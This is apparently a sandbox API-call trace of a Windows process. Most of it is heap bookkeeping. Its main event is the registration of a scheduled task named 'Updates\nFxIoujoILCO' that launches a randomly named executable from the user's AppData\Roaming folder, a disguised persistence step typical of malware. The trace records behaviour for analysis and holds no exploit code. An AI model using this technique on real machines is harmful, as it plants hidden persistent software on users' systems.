[0154.476] CloseHandle (hObject=0x10c) returned 1
[0154.477] lstrlenW (lpString="") returned 0
[0154.478] malloc (_Size=0xc) returned 0x473f00
[0154.478] SysStringLen (param_1="") returned 0x0
[0154.478] free (_Block=0x473f00)
[0154.478] lstrlenW (lpString="") returned 0
[0154.482] ITaskFolder:RegisterTask (in: This=0x473ea8, Path="Updates\\nFxIoujoILCO", XmlText="\n\n \n 2014-10-25T14:27:44.8929027\n Q9IATRKPRH\\kEecfMwgj\n \n \n \n true\n Q9IATRKPRH\\kEecfMwgj\n \n \n false\n \n \n \n \n Q9IATRKPRH\\kEecfMwgj\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\n \n \n", flags=2, UserId=0xdc930*(varType=0x8, wReserved1=0x0, wReserved2=0x4200, wReserved3=0x2a, varVal1="", varVal2=0x2a4200), password=0xdc940*(varType=0x0, wReserved1=0x2a, wReserved2=0x0, wReserved3=0x0, varVal1=0xdc9c8, varVal2=0x76987526), LogonType=0, sddl=0xdc954*(varType=0x0, wReserved1=0x2a, wReserved2=0x4200, wReserved3=0x2a, varVal1=0x0, varVal2=0x0), ppTask=0xdc9b4 | out: ppTask=0xdc9b4*=0x473f38) returned 0x0
[0154.869] GetProcessHeap () returned 0x280000
[0154.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295780
[0154.869] _memicmp (_Buf1=0x294cc8, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.869] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x296760, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0154.869] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0154.869] GetProcessHeap () returned 0x280000
[0154.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x82) returned 0x2a47c0
[0154.870] _vsnwprintf (in: _Buffer=0xdc9c0, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdc964 | out: _Buffer="SUCCESS: The scheduled task \"Updates\\nFxIoujoILCO\" has successfully been created.\n") returned 82
[0154.870] _fileno (_File=0x754b2920) returned 1
[0154.870] _errno () returned 0x4707d8
[0154.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0154.870] _errno () returned 0x4707d8
[0154.870] GetFileType (hFile=0x7) returned 0x2
[0154.871] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0154.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xdc928 | out: lpMode=0xdc928) returned 1
[0154.872] __iob_func () returned 0x754b2900
[0154.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0154.872] lstrlenW (lpString="SUCCESS: The scheduled task \"Updates\\nFxIoujoILCO\" has successfully been created.\n") returned 82
[0154.872] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xdc9c0*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0xdc950, lpReserved=0x0 | out: lpBuffer=0xdc9c0*, lpNumberOfCharsWritten=0xdc950*=0x52) returned 1
[0154.875] IUnknown:Release (This=0x473f38) returned 0x0
[0154.875] TaskScheduler:IUnknown:Release (This=0x473ea8) returned 0x0
[0154.875] TaskScheduler:IUnknown:Release (This=0x473e40) returned 0x1
[0154.875] lstrlenW (lpString="") returned 0
[0154.875] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.875] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50
[0154.875] GetProcessHeap () returned 0x280000
[0154.875] GetProcessHeap () returned 0x280000
[0154.875] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296ac8) returned 1
[0154.875] GetProcessHeap () returned 0x280000
[0154.875] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296ac8) returned 0x1fc
[0154.876] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296ac8 | out: hHeap=0x280000) returned 1
[0154.876] GetProcessHeap () returned 0x280000
[0154.876] GetProcessHeap () returned 0x280000
[0154.876] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58) returned 1
[0154.876] GetProcessHeap () returned 0x280000
[0154.876] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296a58) returned 0x64
[0154.877] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58 | out: hHeap=0x280000) returned 1
[0154.877] GetProcessHeap () returned 0x280000
[0154.877] GetProcessHeap () returned 0x280000
[0154.877] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0) returned 1
[0154.877] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953c0) returned 0x16
[0154.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0 | out: hHeap=0x280000) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x28f0a0) returned 0x10
[0154.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0 | out: hHeap=0x280000) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953e0) returned 0x14
[0154.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0 | out: hHeap=0x280000) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2966b8) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2966b8) returned 0xa0
[0154.879] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2966b8 | out: hHeap=0x280000) returned 1
[0154.879] GetProcessHeap () returned 0x280000
[0154.879] GetProcessHeap () returned 0x280000
[0154.879] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cb0) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294cb0) returned 0x10
[0154.880] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294cb0 | out: hHeap=0x280000) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2952c0) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2952c0) returned 0x14
[0154.880] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2952c0 | out: hHeap=0x280000) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.881] GetProcessHeap () returned 0x280000
[0154.881] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969e8) returned 1
[0154.881] GetProcessHeap () returned 0x280000
[0154.881] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969e8) returned 0x68
[0154.882] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969e8 | out: hHeap=0x280000) returned 1
[0154.882] GetProcessHeap () returned 0x280000
[0154.882] GetProcessHeap () returned 0x280000
[0154.882] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d58) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d58) returned 0x10
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d58 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295280) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295280) returned 0x14
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295280 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d40) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d40) returned 0xc
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d40 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d28) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d28) returned 0x10
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d28 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295260) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.884] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295260) returned 0x14
[0154.884] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295260 | out: hHeap=0x280000) returned 1
[0154.884] GetProcessHeap () returned 0x280000
[0154.884] GetProcessHeap () returned 0x280000
[0154.884] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295ac8) returned 1
[0154.884] GetProcessHeap () returned 0x280000
[0154.884] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295ac8) returned 0x208
[0154.885] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295ac8 | out: hHeap=0x280000) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c50) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c50) returned 0x10
[0154.885] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c50 | out: hHeap=0x280000) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295220) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295220) returned 0x14
[0154.885] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295220 | out: hHeap=0x280000) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296760) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296760) returned 0x200
[0154.887] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296760 | out: hHeap=0x280000) returned 1
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cc8) returned 1
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294cc8) returned 0x10
[0154.887] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294cc8 | out: hHeap=0x280000) returned 1
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2951c0) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2951c0) returned 0x14
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2951c0 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295340) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295340) returned 0x14
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295340 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d10) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d10) returned 0x10
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d10 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295128) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295128) returned 0x14
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295128 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295380) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295380) returned 0x16
[0154.889] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295380 | out: hHeap=0x280000) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294ce0) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294ce0) returned 0x10
[0154.889] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294ce0 | out: hHeap=0x280000) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295108) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295108) returned 0x14
[0154.889] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295108 | out: hHeap=0x280000) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294fd8) returned 1
[0154.890] GetProcessHeap () returned 0x280000
[0154.890] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294fd8) returned 0x2
[0154.890] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294fd8 | out: hHeap=0x280000) returned 1
[0154.890] GetProcessHeap () returned 0x280000
[0154.891] GetProcessHeap () returned 0x280000
[0154.891] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294fe8) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294fe8) returned 0x14
[0154.892] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294fe8 | out: hHeap=0x280000) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295008) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295008) returned 0x14
[0154.892] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295008 | out: hHeap=0x280000) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295028) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295028) returned 0x14
[0154.892] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295028 | out: hHeap=0x280000) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295048) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.893] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295048) returned 0x14
[0154.893] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295048 | out: hHeap=0x280000) returned 1
[0154.894] GetProcessHeap () returned 0x280000
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2952e0) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2952e0) returned 0x14
[0154.895] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2952e0 | out: hHeap=0x280000) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295300) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295300) returned 0x14
[0154.895] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295300 | out: hHeap=0x280000) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296968) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296968) returned 0x30
[0154.897] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296968 | out: hHeap=0x280000) returned 1
[0154.897] GetProcessHeap () returned 0x280000
[0154.897] GetProcessHeap () returned 0x280000
[0154.897] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295320) returned 1
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295320) returned 0x14
[0154.898] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295320 | out: hHeap=0x280000) returned 1
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0) returned 1
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969a0) returned 0x30
[0154.899] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0 | out: hHeap=0x280000) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953a0) returned 0x14
[0154.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0 | out: hHeap=0x280000) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2a47c0) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.935] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2a47c0) returned 0x82
[0154.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2a47c0 | out: hHeap=0x280000) returned 1
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295780) returned 1
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295780) returned 0x14
[0154.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295780 | out: hHeap=0x280000) returned 1
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c08) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c08) returned 0x10
[0154.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c08 | out: hHeap=0x280000) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295068) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295068) returned 0x14
[0154.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295068 | out: hHeap=0x280000) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295088) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295088) returned 0x14
[0154.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295088 | out: hHeap=0x280000) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2950a8) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2950a8) returned 0x14
[0154.937] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2950a8 | out: hHeap=0x280000) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2950c8) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2950c8) returned 0x14
[0154.937] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2950c8 | out: hHeap=0x280000) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c20) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c20) returned 0x10
[0154.937] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c20 | out: hHeap=0x280000) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2950e8) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2950e8) returned 0x14
[0154.938] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2950e8 | out: hHeap=0x280000) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295160) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295160) returned 0x14
[0154.938] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295160 | out: hHeap=0x280000) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2951a0) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2951a0) returned 0x14
[0154.938] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2951a0 | out: hHeap=0x280000) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2951e0) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2951e0) returned 0x14
[0154.939] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2951e0 | out: hHeap=0x280000) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295200) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295200) returned 0x14
[0154.939] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295200 | out: hHeap=0x280000) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2952a0) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2952a0) returned 0x14
[0154.939] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2952a0 | out: hHeap=0x280000) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c38) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c38) returned 0x10
[0154.940] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c38 | out: hHeap=0x280000) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295180) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295180) returned 0x14
[0154.940] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295180 | out: hHeap=0x280000) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294bf0) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294bf0) returned 0x10
[0154.940] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294bf0 | out: hHeap=0x280000) returned 1
[0154.940] exit (_Code=0)
Thread:
id = 13
os_tid = 0x4a8
